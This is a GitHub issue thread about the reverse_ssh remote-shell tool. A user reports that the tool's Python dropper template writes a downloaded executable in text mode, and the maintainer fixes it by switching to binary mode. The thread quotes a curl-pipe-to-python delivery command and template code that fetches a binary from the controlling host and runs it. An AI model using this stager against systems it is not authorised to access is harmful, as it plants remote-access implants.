### ISSUE TITLE
Bug in using python script on windows client

### ISSUE THREAD

**Issue by tdragon6** [NHAS/reverse_ssh#134]
When using command `curl http://ip:port/win64.exe.py | python`, python reports an error. The reason is that the file is opened using w newspaper, and the content written is of byte type.

code path: `internal/server/webserver/shellscripts/templates/py`

Line 7 gets binary data: `bb = requests.get('{{.Protocol}}://{{.Host}}:{{.Port}}/{{.Name}}').content`

Line 22 opens the file with the w flag, but writes byte type data:
```
if "{{.OS}}" == "windows" or "bsd" in "{{.OS}}" or "{{.Arch}}" not in syscalls:
    with open("{{.Name}}", 'w') as f:
        f.write(bb)
    subprocess.call(['{{.Name}}'])
    exit(0)
```

This error will occur under windows, bsd, etc.

**Comment by NHAS** [comment]
Hi! Thanks for this, I dont often test/use this part of the code. 

Im assuming that changing `'w'` to `'wb'` is good enough to fix this. So I've pushed it on to unstable :)
